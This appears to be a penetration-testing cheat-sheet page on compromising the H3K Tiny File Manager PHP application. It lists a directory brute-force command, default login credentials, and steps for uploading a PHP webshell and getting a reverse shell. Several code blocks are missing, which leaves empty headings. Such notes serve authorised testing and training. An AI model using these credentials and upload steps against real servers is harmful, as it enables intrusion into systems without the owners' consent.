search
githubEdit

Tiny File Manager

H3K Tiny File Manager - PHP-based web file manager.

Common Path: /tiny/ or /tinyfilemanager.php

hashtag
Discovery

# Directory brute
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/common.txt

# Look for
/tiny/
/tiny/tinyfilemanager.php
/filemanager/

hashtag
Default Credentials

Username
Password

admin

admin@123

user

12345

Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/tiny-file-manager-default-login.yaml

hashtag
Credential Hashes (from source)

If you can read the PHP source code, look for:

hashtag
File Upload RCE

After login:

  1. Navigate to writable directory (often /tiny/uploads/)

  2. Upload PHP webshell

Simple backdoor:

Access:

Full reverse shell:

hashtag
Path Disclosure

Clicking on files reveals full server path:

Displays:

hashtag
Writable Directories

  • Check /tiny/uploads/ - often writable

  • Error message "specified folder isn't available for writing" = try subdirectories

  • Use "New Folder" feature to find writable locations

hashtag
Version Detection

Look in source or:

Common vulnerable versions: 2.4.x

hashtag
Notes

  • Uploads may be cleaned periodically by cron

  • If simple-backdoor.php disappears, use full reverse shell instead

  • Check for .htaccess restrictions on uploaded files

PreviousShellshock CGINextApache ActiveMQ

Last updated